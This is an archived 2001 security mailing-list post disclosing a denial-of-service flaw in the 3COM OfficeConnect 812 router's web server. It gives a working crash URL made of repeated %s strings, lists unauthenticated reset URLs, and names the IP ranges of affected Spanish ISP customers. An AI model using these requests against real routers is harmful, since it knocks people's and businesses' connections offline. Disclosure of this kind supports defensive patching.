OSEC

Neohapsis is currently accepting applications for employment. For more information, please visit our website www.neohapsis.com or email hr@neohapsis.com
 
From: inc (ix_lsdhotmail.com)
Date: Tue May 15 2001 - 07:56:08 CDT

  • Messages sorted by: [ date ] [ thread ] [ subject ] [ author ]

    Yesterday night I discovered a vulnerabilty. The router is a 3COM
    OfficeConnect 812 and the vulnerability is on the HTTP server, on port 80.
    When you enter with a browser on one of this router, you are asked for
    user/password, if you fail, you can see a web page telling you that is a
    protected objetct, but you have a .GIF file you have access to and you dont
    need to put the .GIF.

    http://192.168.1.254/graphics/sml3com

    well... you put this, and you see the image...

    well.... lets add a long string later

    Exploit:
    --------

    http://192.168.1.254/graphics/sml3com%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%
    s%s%s%s%s%s%s%s%s%%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s
    %s%s%s%s%s%s%s

    ...the router causes an NMI, red lights, flashing lights... and it's dead...
    it disconnect and come online again on a minute.

    3COM OfficeConnect 812 is the router that Terra (from Telefonica Spain) puts
    on almost DSL connections, even for all short of businness. They are selling
    now this router even when is a better firmware (not tested yet) that maybe
    resolve this problem.

    Solution: put filters to the router to the remote sites and only allow
    connections to 23 and 80 from local network. If you're spanish, take care
    cos your IP is fixed and you have a very "clear" domain 195.255.*.* and
    217.97.*.*

    Not Copyrighted by UnMateria - May 2001 :-)

    ANNEX:

    http://192.168.1.254/adsl_pair_select
    http://192.168.1.254/adsl_reset

    Very unsecure for strangers ;-)... the server here doesnt ask for password
    so you cant reset the router from the own web (and without credentials)